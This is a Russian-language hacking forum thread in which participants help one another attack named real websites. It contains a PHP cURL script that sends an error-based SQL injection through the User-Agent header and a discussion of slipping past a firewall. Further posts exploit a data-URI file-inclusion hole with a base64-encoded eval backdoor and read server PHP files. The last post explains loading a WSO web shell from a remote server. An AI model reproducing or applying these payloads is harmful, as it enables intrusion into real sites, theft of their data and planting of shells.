Нашел скуль в User-Agent, запросы через GET обрубаются <h1>Forbidden</h1> <p>You don't have permission to access on this server.</p> поделитесь скриптом на php, для передачи User-Agent в Post-запросе. Сам написать не могу, знаний маловато
User-Agent - это не пост, это заголовок. Он передаётся и при GET и при POST запросах. PHP: <?php $curl = curl_init('http://site.ru/'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_USERAGENT, 'Firefox(user-agent)'); echo curl_exec($curl); ?> ПС Но похоже тебе это не поможет
как сюда уязвимый запрос правильно вставить? <?php $curl = curl_init('http://www.site.ru/'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_USERAGENT, ''and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and''); echo curl_exec($curl); ?>
Верно. Я пропустил одну строчку в оригинале =( PHP: <?php $curl = curl_init('http://localhost/phpinfo.php'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, ""); curl_setopt($curl, CURLOPT_USERAGENT, 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'); echo curl_exec($curl); ?> Попробуй так
Скрипт работает правильно, но версию не выводит, хотя при GET запросе вывод есть Duplicate column name '5.1.68-log' , дальше продвинутся не удается , все фильтруется. Выводить таблицы нужно через POST-запрос
Я видимо не совсем понимаю о чём речь. Этот скрипт как раз делает то что ты попросил, POST запрос с возможностью редактировать User-Agent. Если тебе нужно отправить какие-то параметры POST'ом то Если это всё не то, то приведи пример запроса.
Выкладываю GET http://www.guppik.ru/components/com_true/sub_votepic.php?id=1&user_rating=1 HTTP/1.1 Host: www.guppik.ru User-Agent: 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and' теперь нужно это переделать под POST-запрос, для вывода таблиц
Ок, теперь всё ясно. Ещё раз повторю что User-Agent это заголовок, POST/GET на него не влияют. В данном случае WAF/IPS/... режет запросы в которых есть совпадение '*informa*'. Я минут десять потыкался, но рабочего варианта послать information_schema в User-Agent не нашёл.
И снова вопрос по site/account?mode==data:;base64,<?php include("http://site/path/file.*"); ?> с этим я разобрался,могу просматривать любые файлы и папки кроме файлов *.php ,как открыть php
site/account?mode==data:;base64,<?php echo file_get_contents("http://site/path/file.php"); ?> PS Только сейчас понял, путь-то надо указывать не с веба, а локальный. По типу: site/account?mode==data:;base64,<?php echo file_get_contents("/var/www/path/file.php"); ?>
работает что так <?php echo file_get_contents("http://site/path/file.php"); ?> что так <?php echo file_get_contents("/var/www/path/file.php"); ?> но файлы php не xочет показать
Ок, моя последняя догадка: возможно файлы читаются, но просто не отображаются в браузере. Попробуй посмотреть HTML код страницы(ctrl+f '<?').
Неудивительно, /bin/sh бинарный файл. Если хочешь скинь сюда или в ЛС ссылку. http://go.jetswap.com/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtjbWRdKTsgPz4==&cmd=phpinfo%28%29; у меня не работает, пишет down.
ну раз дыру закрыли, разсказую, вобще не понимаю чё вы так долго там думали, этот кусок тут вобще не нужен был &cmd=phpinfo%28%29; также как и PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==( в басе64 зашифрован код <?php eval($_GET[cmd]); ?>) банально заливаете на другой серв код шелла, потом пишете код $a = file_get_contents("http://site.ru/wso.txt"); eval($a); и усё, видите перед собой ваш шелл, там кругом права урезаны были, одни лишь папка была для записи cache
